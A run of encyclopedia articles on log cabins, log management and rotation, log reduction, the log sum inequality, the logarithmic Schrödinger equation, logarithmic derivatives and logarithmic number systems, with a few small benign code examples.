The Finns were accomplished in building several forms of log housing, having different methods of corner timbering, and they utilized both round and hewn logs. Their log building had undergone an evolutionary process from the crude "pirtti"... a small gabled-roof cabin of round logs with an opening in the roof to vent smoke, to more sophisticated squared logs with interlocking double-notch joints, the timber extending beyond the corners. Log saunas or bathhouses of this type are still found in rural Finland.
By stacking tree trunks one on top of another and overlapping the logs at the corners, people made the "log cabin". They developed interlocking corners by notching the logs at the ends, resulting in strong structures that were easier to make weather-tight by inserting moss or other soft material into the joints. As the original coniferous forest extended over the coldest parts of the world, there was a prime need to keep these cabins warm. The insulating properties of the solid wood were a great advantage over a timber frame construction covered with animal skins, felt , boards or shingles . Over the decades, increasingly complex joints were developed to ensure more weather tight joints between the logs, but the profiles were still largely based on the round log. [ 2 ]
A medieval log cabin was considered movable property, evidenced by the relocation of Espåby in 1557, where the buildings were disassembled, transported to a new location, and reassembled. It was also common to replace individual logs damaged by dry rot as necessary.
The Wood Museum in Trondheim , Norway, displays fourteen different traditional profiles, but a basic form of log construction was used all over North Europe and Asia and later imported to America.
Log construction was especially suited to Scandinavia, where straight, tall tree trunks ( pine and spruce ) are readily available. With suitable tools, a log cabin can be erected from scratch in days by a family. As no chemical reaction is involved, such as hardening of mortar, a log cabin can be erected in any weather or season. Many older towns in Northern Scandinavia have been built exclusively out of log houses, which have been decorated by board paneling and wood cuttings. Today, construction of modern log cabins as leisure homes is a fully developed industry in Finland and Sweden. Modern log cabins often feature fiberglass insulation and are sold as prefabricated kits machined in a factory, rather than hand-built in the field like ancient log cabins.
Log cabins are mostly constructed without the use of nails and thus derive their stability from simple stacking, with only a few dowel joints for reinforcement. This is because a log cabin tends to compress slightly as it settles, over a few months or years. Nails would soon be out of alignment and torn out.
Log cabins were largely built from logs laid horizontally and interlocked on the ends with notches. Some log cabins were built without notches and simply nailed together, but this was not as structurally sound.
The most important aspect of cabin building was the site upon which the cabin was built. Site selection was aimed at providing the cabin inhabitants with both sunlight and drainage to make them better able to cope with the rigors of frontier life. Proper site selection placed the home in a location best suited to manage the farm or ranch. When the first pioneers built cabins, they were able to "cherry pick" the best logs for cabins. These were old-growth trees with few limbs (knots) and straight with little taper. Such logs did not need to be hewn to fit well together. Careful notching minimized the size of the gap between the logs and reduced the amount of chinking (sticks or rocks) or daubing (mud) needed to fill the gap. The length of one log was generally the length of one wall, although this was not a limitation for most good cabin builders.
Decisions had to be made about the type of cabin. Styles varied greatly from one part of North America to another: the size of the cabin, the number of stories, type of roof, the orientation of doors and windows all needed to be taken into account when the cabin was designed. In addition, the source of the logs, the source of stone and available labor, either human or animal, had to be considered. If timber sources were further away from the site, the cabin size might be limited.
In North America , cabins were constructed using a variety of notches. One method common in the Ohio River Valley in Southwestern Ohio and Southeastern Indiana is the block house end method, which is exemplified in the David Brown House in Rising Sun, Indiana .
Some older buildings in the Midwestern United States and the Canadian Prairies are log structures covered with clapboards or other materials. 19th-century cabins used as dwellings were occasionally plastered on the interior. The O'Farrell Cabin ( c. 1865 ) in Boise , Idaho , had backed wallpaper used over newspaper. The C.C.A. Christenson Cabin in Ephraim , Utah ( c. 1880 ) was plastered over willow lath. Log cabins reached their peak of complexity and elaboration with the Adirondack-style cabins of the mid-19th century. This style was the inspiration for many United States Park Service lodges built at the end of the 19th century and beginning of the 20th century.
Log cabin building never died out or fell out of favor. It was surpassed by the needs of a growing urban United States. During the 1930s and the Great Depression , the Roosevelt administration directed the Civilian Conservation Corps to build log lodges throughout the west for use by the Forest Service and the National Park Service . Timberline Lodge on Mount Hood in Oregon was such a log structure, and it was dedicated by President Franklin D. Roosevelt . In 1930, the world's largest log cabin was constructed at a private resort in Montebello , Quebec , Canada . Often described as a log château, it serves as the Château Montebello hotel.
The modern version of a log cabin is the log home , which is a house built usually from milled logs. The logs are visible on the exterior and sometimes interior of the house. These cabins are mass manufactured, traditionally in Scandinavian countries and increasingly in Eastern Europe . Squared milled logs are precut for easy assembly. Log homes are popular in rural areas, and even in some suburban locations. In many resort communities in the Western United States , homes of log and stone measuring over 3,000 sq ft (280 m 2 ) are not uncommon. These "kit" log homes are one of the largest consumers of logs in the Western United States.
In the United States, log homes have embodied a traditional approach to home building, one that has resonated throughout American history . Log homes represent a technology that allows a home to be built with a high degree of sustainability . They are frequently considered to be on the leading edge of the green building movement.
Crib barns were a popular type of barn found throughout the American Southern and Southeastern regions . Crib barns were especially ubiquitous in the Appalachian and Ozark Mountain states of North Carolina , Virginia , Kentucky , Tennessee , and Arkansas . In Europe , modern log cabins are often built in gardens and used as summerhouses, home offices, or as an additional room in the garden. Summer houses and cottages are often built from logs in Northern Europe .
Chinking refers to a broad range of mortar or other infill materials used between the logs in the construction of log cabins and other log-walled structures. Traditionally, dried mosses, such as Pleurozium schreberi or Hylocomium splendens , were used in the Nordic countries as an insulator between logs. In the United States, chinks were small stones, pieces of wood, or corn cobs stuffed between the logs.
In the United States, settlers may have first constructed log cabins by 1640. Historians believe that the first log cabins built in North America were in the Swedish colony of New Sweden along the Delaware River and Brandywine River valleys.
Most of the settlers were actually Forest Finns , a heavily oppressed Finnish ethnic group originally from Savonia and Tavastia . Starting in the 1500s, during Sweden's more than 600-year colonial rule over Finland, they were displaced or persuaded to settle and practice slash-and-burn agriculture (for which they were famous in eastern Finland) in the deep forests of inland Sweden and Norway; from 1640 they were being captured and displaced to the colony. [ 3 ]
After arriving, they would escape the Fort Christina center, where the Swedes lived, to live in the forest as they had back home. They encountered the Lenape Indian tribe, with whom they found many cultural similarities, including slash-and-burn agriculture, sweat lodges and saunas, and a love of forests, and they ended up living alongside and even culturally assimilating with them [ 4 ] (they are the earlier and lesser-known Findian tribe, [ 5 ] [ 6 ] overshadowed by the Ojibwe Findians of Minnesota, Michigan and Ontario, Canada). In those forests the first log cabins of America were built, using traditional Finnish methods. Even though New Sweden existed only briefly before it was absorbed by the Dutch colony of New Netherland , which was eventually taken over by the English, these quick and easy construction techniques of the Finns not only remained but spread. [ citation needed ]
Germans and Ukrainians also used this technique. The contemporaneous British settlers had no tradition of building with logs, but they quickly adopted the method. The first English settlers did not widely use log cabins, building in forms more traditional to them. [ 7 ] Few log cabins dating from the 18th century still stand, but they were often not intended as permanent dwellings. Possibly the oldest surviving log house in the United States is the C. A. Nothnagle Log House ( c. 1640 ) in New Jersey. Settlers often built log cabins as temporary homes to live in while constructing larger, permanent houses; then they either demolished the log structures or used them as outbuildings, such as barns or chicken coops . [ citation needed ]
Log cabins were sometimes hewn on the outside so that siding might be applied; they also might be hewn inside and covered with a variety of materials, ranging from plaster over lath to wallpaper . [ citation needed ]
Log cabins were constructed with either a purlin roof structure or a rafter roof structure. A purlin roof consists of horizontal logs that are notched into the gable-wall logs. The latter are progressively shortened to form the characteristic triangular gable end. The steepness of the roof was determined by the reduction in size of each gable-wall log as well as the total number of gable-wall logs. Flatter roofed cabins might have had only 2 or 3 gable-wall logs while steeply pitched roofs might have had as many gable-wall logs as a full story. Issues related to eave overhang and a porch also influenced the layout of the cabin.
The decision about roof type often was based on the material for roofing like bark. Milled lumber was usually the most popular choice for rafter roofs in areas where it was available. These roofs typify many log cabins built in the 20th century, having full-cut 2×4 rafters covered with pine and cedar shingles. The purlin roofs found in rural settings and locations, where milled lumber was not available, often were covered with long hand-split shingles.
The log cabin has been a symbol of humble origins in U.S. politics since the early 19th century. At least seven U.S. presidents were born in log cabins, including Andrew Jackson , James K. Polk , Millard Fillmore , Franklin Pierce , James Buchanan , Abraham Lincoln , and James A. Garfield . [ 8 ] Although William Henry Harrison was not born in a log cabin, he and the Whigs were among the first to use them during the 1840 presidential election as a symbol to show Americans that he was a man of the people. [ 9 ] Other candidates followed Harrison's example, making the idea of a log cabin a recurring theme in U.S. presidential campaigns. [ 10 ]
More than a century after Harrison, Adlai Stevenson II said, "I wasn't born in a log cabin. I didn't work my way through school nor did I rise from rags to riches, and there's no use trying to pretend I did." [ 10 ] Stevenson lost the 1952 presidential election in a landslide to Dwight D. Eisenhower .
A popular children's toy in the United States is Lincoln Logs , which are various notched dowel rods that can be fitted together to build scale miniature-sized structures. | https://en.wikipedia.org/wiki/Log_cabin |
Log management is the process for generating, transmitting, storing, accessing, and disposing of log data. Log data (or logs ) are composed of entries (records); each entry contains information related to a specific event that occurs within an organization's computing assets, including physical and virtual platforms, networks, services, and cloud environments. [ 1 ]
The process of log management generally breaks down into: [ 2 ]
The primary drivers for log management implementations are concerns about security , [ 3 ] system and network operations (such as system or network administration ) and regulatory compliance. Logs are generated by nearly every computing device, and can often be directed to different locations both on a local file system or remote system.
Effectively analyzing large volumes of diverse logs can pose many challenges, such as:
Users and potential users of log management may purchase complete commercial tools or build their own log-management and intelligence tools, assembling the functionality from various open-source components, or acquire (sub-)systems from commercial vendors. Log management is a complicated process and organizations often make mistakes while approaching it. [ 4 ]
Logging can produce technical information usable for the maintenance of applications or websites. It can serve:
Suggestions were made [ by whom? ] to change the definition of logging. This change would keep matters both purer and more easily maintainable:
One view [ citation needed ] of assessing the maturity of an organization in terms of the deployment of log-management tools might use [ original research? ] successive levels such as: | https://en.wikipedia.org/wiki/Log_management |
Log reduction is a measure of how thoroughly a decontamination process reduces the concentration of a contaminant .
It is defined as the common logarithm of the ratio of the levels of contamination before and after the process, so an increment of 1 corresponds to a reduction in concentration by a factor of 10.
In general, an n -log reduction means that the concentration of remaining contaminants is only 10 − n times that of the original. So for example, a 0-log reduction is no reduction at all, while a 1-log reduction corresponds to a reduction of 90 percent from the original concentration, and a 2-log reduction corresponds to a reduction of 99 percent from the original concentration. [ 1 ]
Let c b and c a be the numerical values of the concentrations of a given contaminant, respectively before and after treatment, following a defined process.
It is irrelevant in what units these concentrations are given, provided that both use the same units.
Then an R -log reduction is achieved, where
R = log 10 ⁡ ( c b / c a ) {\displaystyle R=\log _{10}(c_{b}/c_{a})}
For the purpose of presentation, the value of R is rounded down to a desired precision, usually to a whole number.
Let the concentration of some contaminant be 580 ppm before and 0.725 ppm after treatment. Then
R = log 10 ⁡ ( 580 / 0.725 ) = log 10 ⁡ ( 800 ) ≈ 2.9 {\displaystyle R=\log _{10}(580/0.725)=\log _{10}(800)\approx 2.9}
Rounded down, R is 2, so a 2-log reduction is achieved.
Conversely, an R -log reduction means that a reduction by a factor of 10 R has been achieved.
Reduction is often expressed as a percentage . The closer it is to 100%, the better.
Letting c b and c a be as before, a reduction by P % is achieved, where
P = 100 ( 1 − c a / c b ) {\displaystyle P=100\left(1-c_{a}/c_{b}\right)}
Let, as in the earlier example, the concentration of some contaminant be 580 ppm before and 0.725 ppm after treatment. Then
P = 100 ( 1 − 0.725 / 580 ) = 99.875 {\displaystyle P=100\left(1-0.725/580\right)=99.875}
So this is (better than) a 99% reduction, but not yet quite a 99.9% reduction.
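Both calculations are easy to check in Python; the following is just the definitions above applied to the example figures:

```python
import math

def log_reduction(c_before, c_after):
    # R = log10(c_b / c_a); both concentrations must use the same units.
    return math.log10(c_before / c_after)

R = log_reduction(580, 0.725)
print(R)                          # ~2.903, i.e. a 2-log reduction
print(100 * (1 - 0.725 / 580))    # 99.875 percent reduction
```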
The following summarizes the most common cases: a 1-log reduction corresponds to a 90% reduction, 2-log to 99%, 3-log to 99.9%, 4-log to 99.99%, 5-log to 99.999%, and 6-log to 99.9999%.
In general, if R is a whole number, an R -log reduction corresponds to a percentage reduction with R leading digits "9" in the percentage (provided that it is at least 10%). | https://en.wikipedia.org/wiki/Log_reduction |
In information technology , log rotation is an automated process used in system administration in which log files are compressed, moved ( archived ), renamed or deleted once they are too old or too big (other criteria can also apply).
New incoming log data is directed into a new fresh file (at the same location). [ 1 ]
The main purpose of log rotation is to restrict the volume of the log data to avoid overflowing the record store, while keeping the log files small enough so viewers can still open them.
Servers which run large applications, such as LAMP stacks , often log every request: in the face of bulky logs, log rotation provides a way to limit the total size of the logs retained while still allowing analysis of recent events.
Even though some arguments in favor of log rotation imply that maintaining smaller files increases writing performance, the size of a file does not affect its writing performance. The reason is that in most modern filesystem implementations the kernel tracks the size of each file, so appending data only requires a seek syscall to position the write pointer at the end of the file, which is a constant-time operation.
In Linux log rotation is typically performed using the logrotate command . [ 2 ] [ 3 ] The command can be used to email logs to a systems administrator after log rotation. Dated logs may also be compressed .
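As an illustration, a minimal logrotate configuration fragment; the log path and the retention policy here are examples only, not a recommendation:

```
/var/log/myapp.log {
    weekly
    rotate 4
    compress
    missingok
    notifempty
}
```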
In FreeBSD and macOS the newsyslog command is used. [ 4 ] It has the ability to trigger rotation based on file size, time or interval (or any combination thereof). It can compress the archives and send a signal to a process to reset logging.
The command is often run as a cron job, which has the effect of fully automatic log rotation.
Typically, a new logfile is created periodically, and the old logfile is renamed by appending a "1" to the name. Each time a new log file is started, the numbers in the file names of old logfiles are increased by one, so the files "rotate" through the numbers (thus the name "log rotation"). Old logfiles whose number exceeds a threshold can then be deleted or archived off-line to save space.
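The renaming scheme just described can be sketched in a few lines of Python (the path and retention count are illustrative):

```python
import os

def rotate(path, keep=5):
    # Drop the oldest archive, shift each numbered archive up by one,
    # then move the live file to ".1" so logging restarts on a fresh file.
    oldest = f"{path}.{keep}"
    if os.path.exists(oldest):
        os.remove(oldest)
    for n in range(keep - 1, 0, -1):
        if os.path.exists(f"{path}.{n}"):
            os.rename(f"{path}.{n}", f"{path}.{n + 1}")
    if os.path.exists(path):
        os.rename(path, f"{path}.1")
```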
This computing article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Log_rotation |
The log sum inequality is used for proving theorems in information theory .
Let a 1 , … , a n {\displaystyle a_{1},\ldots ,a_{n}} and b 1 , … , b n {\displaystyle b_{1},\ldots ,b_{n}} be nonnegative numbers. Denote the sum of all a i {\displaystyle a_{i}} s by a {\displaystyle a} and the sum of all b i {\displaystyle b_{i}} s by b {\displaystyle b} . The log sum inequality states that
∑ i = 1 n a i log ⁡ a i b i ≥ a log ⁡ a b {\displaystyle \sum _{i=1}^{n}a_{i}\log {\frac {a_{i}}{b_{i}}}\geq a\log {\frac {a}{b}}}
with equality if and only if a i b i {\displaystyle {\frac {a_{i}}{b_{i}}}} are equal for all i {\displaystyle i} , in other words a i = c b i {\displaystyle a_{i}=cb_{i}} for all i {\displaystyle i} . [ 1 ]
(Take a i log a i b i {\displaystyle a_{i}\log {\frac {a_{i}}{b_{i}}}} to be 0 {\displaystyle 0} if a i = 0 {\displaystyle a_{i}=0} and ∞ {\displaystyle \infty } if a i > 0 , b i = 0 {\displaystyle a_{i}>0,b_{i}=0} . These are the limiting values obtained as the relevant number tends to 0 {\displaystyle 0} .) [ 1 ]
Notice that after setting f ( x ) = x log ⁡ x {\displaystyle f(x)=x\log x} we have
∑ i = 1 n a i log ⁡ a i b i = ∑ i = 1 n b i f ( a i b i ) = b ∑ i = 1 n b i b f ( a i b i ) ≥ b f ( ∑ i = 1 n b i b a i b i ) = b f ( a b ) = a log ⁡ a b , {\displaystyle \sum _{i=1}^{n}a_{i}\log {\frac {a_{i}}{b_{i}}}=\sum _{i=1}^{n}b_{i}f\left({\frac {a_{i}}{b_{i}}}\right)=b\sum _{i=1}^{n}{\frac {b_{i}}{b}}f\left({\frac {a_{i}}{b_{i}}}\right)\geq bf\left(\sum _{i=1}^{n}{\frac {b_{i}}{b}}{\frac {a_{i}}{b_{i}}}\right)=bf\left({\frac {a}{b}}\right)=a\log {\frac {a}{b}},}
where the inequality follows from Jensen's inequality since b i b ≥ 0 {\displaystyle {\frac {b_{i}}{b}}\geq 0} , ∑ i = 1 n b i b = 1 {\displaystyle \sum _{i=1}^{n}{\frac {b_{i}}{b}}=1} , and f {\displaystyle f} is convex. [ 1 ]
The inequality remains valid for n = ∞ {\displaystyle n=\infty } provided that a < ∞ {\displaystyle a<\infty } and b < ∞ {\displaystyle b<\infty } . [ citation needed ] The proof above holds for any function g {\displaystyle g} such that f ( x ) = x g ( x ) {\displaystyle f(x)=xg(x)} is convex, such as all continuous non-decreasing functions. Generalizations to non-decreasing functions other than the logarithm is given in Csiszár, 2004.
Another generalization is due to Dannan, Neff and Thiel, who showed that if a 1 , a 2 ⋯ a n {\displaystyle a_{1},a_{2}\cdots a_{n}} and b 1 , b 2 ⋯ b n {\displaystyle b_{1},b_{2}\cdots b_{n}} are positive real numbers with a 1 + a 2 ⋯ + a n = a {\displaystyle a_{1}+a_{2}\cdots +a_{n}=a} and b 1 + b 2 ⋯ + b n = b {\displaystyle b_{1}+b_{2}\cdots +b_{n}=b} , and k ≥ 0 {\displaystyle k\geq 0} , then ∑ i = 1 n a i log ( a i b i + k ) ≥ a log ( a b + k ) {\displaystyle \sum _{i=1}^{n}a_{i}\log \left({\frac {a_{i}}{b_{i}}}+k\right)\geq a\log \left({\frac {a}{b}}+k\right)} . [ 2 ]
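Numerically, the basic inequality is easy to check; the following Python snippet uses arbitrarily chosen nonnegative values and the natural logarithm (any base works):

```python
import math

a = [0.2, 1.5, 3.0]
b = [0.5, 0.5, 2.0]

lhs = sum(ai * math.log(ai / bi) for ai, bi in zip(a, b))
rhs = sum(a) * math.log(sum(a) / sum(b))
print(lhs, ">=", rhs, ":", lhs >= rhs)  # True; equality needs a_i = c * b_i
```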
The log sum inequality can be used to prove inequalities in information theory. Gibbs' inequality states that the Kullback-Leibler divergence is non-negative, and equal to zero precisely if its arguments are equal. [ 3 ] One proof uses the log sum inequality.
Indeed, applying the log sum inequality to the distributions P = ( p 1 , … , p n ) {\displaystyle P=(p_{1},\ldots ,p_{n})} and Q = ( q 1 , … , q n ) {\displaystyle Q=(q_{1},\ldots ,q_{n})} gives
D K L ( P ∥ Q ) = ∑ i = 1 n p i log ⁡ p i q i ≥ ( ∑ i = 1 n p i ) log ⁡ ∑ i = 1 n p i ∑ i = 1 n q i = 1 ⋅ log ⁡ 1 = 0 , {\displaystyle D_{\mathrm {KL} }(P\parallel Q)=\sum _{i=1}^{n}p_{i}\log {\frac {p_{i}}{q_{i}}}\geq \left(\sum _{i=1}^{n}p_{i}\right)\log {\frac {\sum _{i=1}^{n}p_{i}}{\sum _{i=1}^{n}q_{i}}}=1\cdot \log 1=0,}
with equality if and only if p i = q i {\displaystyle p_{i}=q_{i}} for all i (as both P {\displaystyle P} and Q {\displaystyle Q} sum to 1).
The inequality can also prove convexity of Kullback-Leibler divergence. [ 4 ] | https://en.wikipedia.org/wiki/Log_sum_inequality |
In theoretical physics , the logarithmic Schrödinger equation (sometimes abbreviated as LNSE or LogSE ) is one of the nonlinear modifications of Schrödinger's equation , first proposed by Gerald H. Rosen in its relativistic version (with D'Alembertian instead of Laplacian and first-order time derivative) in 1969. [ 1 ] It is a classical wave equation with applications to extensions of quantum mechanics , [ 2 ] [ 3 ] [ 4 ] quantum optics , [ 5 ] nuclear physics , [ 6 ] [ 7 ] transport and diffusion phenomena, [ 8 ] [ 9 ] open quantum systems and information theory , [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] effective quantum gravity and physical vacuum models [ 16 ] [ 17 ] [ 18 ] [ 19 ] and theory of superfluidity and Bose–Einstein condensation . [ 20 ] [ 21 ] It is an example of an integrable model .
The logarithmic Schrödinger equation is a partial differential equation . In mathematics and mathematical physics one often uses its dimensionless form: i ∂ ψ ∂ t + ∇ 2 ψ + ψ ln | ψ | 2 = 0. {\displaystyle i{\frac {\partial \psi }{\partial t}}+\nabla ^{2}\psi +\psi \ln |\psi |^{2}=0.} for the complex-valued function ψ = ψ ( x , t ) of the particle's position vector x = ( x , y , z ) at time t , and ∇ 2 ψ = ∂ 2 ψ ∂ x 2 + ∂ 2 ψ ∂ y 2 + ∂ 2 ψ ∂ z 2 {\displaystyle \nabla ^{2}\psi ={\frac {\partial ^{2}\psi }{\partial x^{2}}}+{\frac {\partial ^{2}\psi }{\partial y^{2}}}+{\frac {\partial ^{2}\psi }{\partial z^{2}}}} is the Laplacian of ψ in Cartesian coordinates . The logarithmic term ψ ln | ψ | 2 {\displaystyle \psi \ln |\psi |^{2}} has been shown to be indispensable for ensuring that the speed of sound scales as the cube root of pressure for Helium-4 at very low temperatures. [ 22 ] This logarithmic term is also needed for cold sodium atoms. [ 23 ] In spite of the logarithmic term, it has been shown that in the case of central potentials, even for non-zero angular momentum, the LogSE retains certain symmetries similar to those found in its linear counterpart, making it potentially applicable to atomic and nuclear systems. [ 24 ]
The relativistic version of this equation can be obtained by replacing the derivative operator with the D'Alembertian , similarly to the Klein–Gordon equation . Soliton-like solutions known as Gaussons figure prominently as analytical solutions to this equation for a number of cases. | https://en.wikipedia.org/wiki/Logarithmic_Schrödinger_equation |
In mathematics , specifically in calculus and complex analysis , the logarithmic derivative of a function f is defined by the formula f ′ f {\displaystyle {\frac {f'}{f}}} where f ′ {\displaystyle f'} is the derivative of f . [ 1 ] Intuitively, this is the infinitesimal relative change in f ; that is, the infinitesimal absolute change in f, namely f ′ , {\displaystyle f',} scaled by the current value of f.
When f is a function f ( x ) of a real variable x , and takes real , strictly positive values, this is equal to the derivative of ln( f ), or the natural logarithm of f . This follows directly from the chain rule : [ 1 ] d d x ln f ( x ) = 1 f ( x ) d f ( x ) d x {\displaystyle {\frac {d}{dx}}\ln f(x)={\frac {1}{f(x)}}{\frac {df(x)}{dx}}}
Many properties of the real logarithm also apply to the logarithmic derivative, even when the function does not take values in the positive reals. For example, since the logarithm of a product is the sum of the logarithms of the factors, we have ( log u v ) ′ = ( log u + log v ) ′ = ( log u ) ′ + ( log v ) ′ . {\displaystyle (\log uv)'=(\log u+\log v)'=(\log u)'+(\log v)'.} So for positive-real-valued functions, the logarithmic derivative of a product is the sum of the logarithmic derivatives of the factors. But we can also use the Leibniz law for the derivative of a product to get ( u v ) ′ u v = u ′ v + u v ′ u v = u ′ u + v ′ v . {\displaystyle {\frac {(uv)'}{uv}}={\frac {u'v+uv'}{uv}}={\frac {u'}{u}}+{\frac {v'}{v}}.} Thus, it is true for any function that the logarithmic derivative of a product is the sum of the logarithmic derivatives of the factors (when they are defined).
A corollary to this is that the logarithmic derivative of the reciprocal of a function is the negation of the logarithmic derivative of the function: ( 1 / u ) ′ 1 / u = − u ′ / u 2 1 / u = − u ′ u , {\displaystyle {\frac {(1/u)'}{1/u}}={\frac {-u'/u^{2}}{1/u}}=-{\frac {u'}{u}},} just as the logarithm of the reciprocal of a positive real number is the negation of the logarithm of the number. [ citation needed ]
More generally, the logarithmic derivative of a quotient is the difference of the logarithmic derivatives of the dividend and the divisor: ( u / v ) ′ u / v = ( u ′ v − u v ′ ) / v 2 u / v = u ′ u − v ′ v , {\displaystyle {\frac {(u/v)'}{u/v}}={\frac {(u'v-uv')/v^{2}}{u/v}}={\frac {u'}{u}}-{\frac {v'}{v}},} just as the logarithm of a quotient is the difference of the logarithms of the dividend and the divisor.
Generalising in another direction, the logarithmic derivative of a power (with constant real exponent) is the product of the exponent and the logarithmic derivative of the base: ( u k ) ′ u k = k u k − 1 u ′ u k = k u ′ u , {\displaystyle {\frac {(u^{k})'}{u^{k}}}={\frac {ku^{k-1}u'}{u^{k}}}=k{\frac {u'}{u}},} just as the logarithm of a power is the product of the exponent and the logarithm of the base.
In summary, both derivatives and logarithms have a product rule , a reciprocal rule , a quotient rule , and a power rule (compare the list of logarithmic identities ); each pair of rules is related through the logarithmic derivative.
Logarithmic derivatives can simplify the computation of derivatives requiring the product rule while producing the same result. The procedure is as follows: Suppose that f ( x ) = u ( x ) v ( x ) {\displaystyle f(x)=u(x)v(x)} and that we wish to compute f ′ ( x ) {\displaystyle f'(x)} . Instead of computing it directly as f ′ = u ′ v + v ′ u {\displaystyle f'=u'v+v'u} , we compute its logarithmic derivative. That is, we compute: f ′ f = u ′ u + v ′ v . {\displaystyle {\frac {f'}{f}}={\frac {u'}{u}}+{\frac {v'}{v}}.}
Multiplying through by f computes f ′ : f ′ = f ⋅ ( u ′ u + v ′ v ) . {\displaystyle f'=f\cdot \left({\frac {u'}{u}}+{\frac {v'}{v}}\right).}
This technique is most useful when f is a product of a large number of factors, since it makes it possible to compute f ′ by computing the logarithmic derivative of each factor, summing, and multiplying by f .
For example, we can compute the logarithmic derivative of e x 2 ( x − 2 ) 3 ( x − 3 ) ( x − 1 ) − 1 {\displaystyle e^{x^{2}}(x-2)^{3}(x-3)(x-1)^{-1}} to be 2 x + 3 x − 2 + 1 x − 3 − 1 x − 1 {\displaystyle 2x+{\frac {3}{x-2}}+{\frac {1}{x-3}}-{\frac {1}{x-1}}} .
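This example can be verified symbolically; the sketch below uses the sympy library to confirm that the derivative divided by the function matches the stated logarithmic derivative:

```python
import sympy as sp

x = sp.symbols('x')
f = sp.exp(x**2) * (x - 2)**3 * (x - 3) / (x - 1)

# Logarithmic derivative computed directly as f'/f.
log_deriv = sp.simplify(sp.diff(f, x) / f)
claimed = 2*x + 3/(x - 2) + 1/(x - 3) - 1/(x - 1)
print(sp.simplify(log_deriv - claimed))  # prints 0
```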
The logarithmic derivative idea is closely connected to the integrating factor method for first-order differential equations . In operator terms, write D = d d x {\displaystyle D={\frac {d}{dx}}} and let M denote the operator of multiplication by some given function G ( x ). Then M − 1 D M {\displaystyle M^{-1}DM} can be written (by the product rule ) as D + M ∗ {\displaystyle D+M^{*}} where M ∗ {\displaystyle M^{*}} now denotes the multiplication operator by the logarithmic derivative G ′ G {\displaystyle {\frac {G'}{G}}}
In practice we are given an operator such as D + F = L {\displaystyle D+F=L} and wish to solve equations L ( h ) = f {\displaystyle L(h)=f} for the function h , given f . This then reduces to solving G ′ G = F {\displaystyle {\frac {G'}{G}}=F} which has as solution exp ( ∫ F ) {\displaystyle \exp \textstyle (\int F)} with any indefinite integral of F . [ citation needed ]
The formula as given can be applied more widely; for example if f ( z ) is a meromorphic function , it makes sense at all complex values of z at which f has neither a zero nor a pole . Further, at a zero or a pole the logarithmic derivative behaves in a way that is easily analysed in terms of the particular case
with n an integer, n ≠ 0 . The logarithmic derivative is then n / z {\displaystyle n/z} and one can draw the general conclusion that for f meromorphic, the singularities of the logarithmic derivative of f are all simple poles, with residue n from a zero of order n , residue − n from a pole of order n . See argument principle . This information is often exploited in contour integration . [ 2 ] [ 3 ] [ verification needed ]
In the field of Nevanlinna theory , an important lemma states that the proximity function of a logarithmic derivative is small with respect to the Nevanlinna characteristic of the original function, for instance m ( r , h ′ / h ) = S ( r , h ) = o ( T ( r , h ) ) {\displaystyle m(r,h'/h)=S(r,h)=o(T(r,h))} . [ 4 ] [ verification needed ]
Behind the use of the logarithmic derivative lie two basic facts about GL 1 , that is, the multiplicative group of real numbers or other field . The differential operator X d d X {\displaystyle X{\frac {d}{dX}}} is invariant under dilation (replacing X by aX for a constant). And the differential form d x X {\displaystyle {\frac {dx}{X}}} is likewise invariant. For functions F into GL 1 , the formula d F F {\displaystyle {\frac {dF}{F}}} is therefore a pullback of the invariant form. [ citation needed ] | https://en.wikipedia.org/wiki/Logarithmic_derivative |
A logarithmic number system ( LNS ) is an arithmetic system used for representing real numbers in computer and digital hardware , especially for digital signal processing .
A number, X {\displaystyle X} , is represented in an LNS by two components: the logarithm ( x {\displaystyle x} ) of its absolute value (as a binary word usually in two's complement ), and its sign bit ( s {\displaystyle s} ):
x = log b ⁡ | X | , s = { 0 if X > 0 1 if X < 0 {\displaystyle x=\log _{b}|X|,\qquad s={\begin{cases}0&{\text{if }}X>0\\1&{\text{if }}X<0\end{cases}}}
An LNS can be considered as a floating-point number with the significand being always equal to 1 and a non-integer exponent . This formulation simplifies the operations of multiplication, division, powers and roots, since they reduce to addition, subtraction, multiplication, and division, respectively.
On the other hand, the operations of addition and subtraction are more complicated and are calculated by the formulae
log b ⁡ ( | X | + | Y | ) = x + s b ( y − x ) , log b ⁡ | | X | − | Y | | = x + d b ( y − x ) , {\displaystyle \log _{b}(|X|+|Y|)=x+s_{b}(y-x),\qquad \log _{b}{\bigl |}|X|-|Y|{\bigr |}=x+d_{b}(y-x),}
where the "sum" function is defined by s b ( z ) = log b ( 1 + b z ) {\displaystyle s_{b}(z)=\log _{b}(1+b^{z})} , and the "difference" function by d b ( z ) = log b | 1 − b z | {\displaystyle d_{b}(z)=\log _{b}|1-b^{z}|} . These functions s b ( z ) {\displaystyle s_{b}(z)} and d b ( z ) {\displaystyle d_{b}(z)} are also known as Gaussian logarithms .
The simplification of multiplication, division, roots, and powers is counterbalanced by the cost of evaluating these functions for addition and subtraction. This added cost of evaluation may not be critical when using an LNS primarily for increasing the precision of floating-point math operations.
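A toy illustration in Python of why multiplication becomes cheap while addition needs the Gaussian-logarithm "sum" function; the function names are invented for this sketch:

```python
import math

BASE = 2.0

def encode(value):
    # (sign bit, base-2 log of magnitude); zero has no finite representation.
    return (0 if value > 0 else 1, math.log(abs(value), BASE))

def multiply(p, q):
    # Multiplication is just addition of logs; sign bits combine by XOR.
    return (p[0] ^ q[0], p[1] + q[1])

def add_magnitudes(x, y):
    # log_b(|X| + |Y|) = max + s_b(min - max), with s_b(z) = log_b(1 + b**z).
    lo, hi = sorted((x, y))
    return hi + math.log(1.0 + BASE ** (lo - hi), BASE)

s, x = multiply(encode(6.0), encode(7.0))
print(BASE ** x)  # 42.0 (sign bit s is 0)
```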
Logarithmic number systems have been independently invented and published at least three times as an alternative to fixed-point and floating-point number systems. [ 1 ]
Nicholas Kingsbury and Peter Rayner introduced "logarithmic arithmetic" for digital signal processing (DSP) in 1971. [ 2 ]
A similar LNS named "signed logarithmic number system" (SLNS) was described in 1975 by Earl Swartzlander and Aristides Alexopoulos ; rather than use two's complement notation for the logarithms, they offset them (scale the numbers being represented) to avoid negative logs. [ 3 ]
Samuel Lee and Albert Edgar described a similar system, which they called the "Focus" number system, in 1977. [ 4 ] [ 1 ] [ 5 ] [ 6 ]
The mathematical foundations for addition and subtraction in an LNS trace back to Zecchini Leonelli and Carl Friedrich Gauss in the early 1800s. [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ]
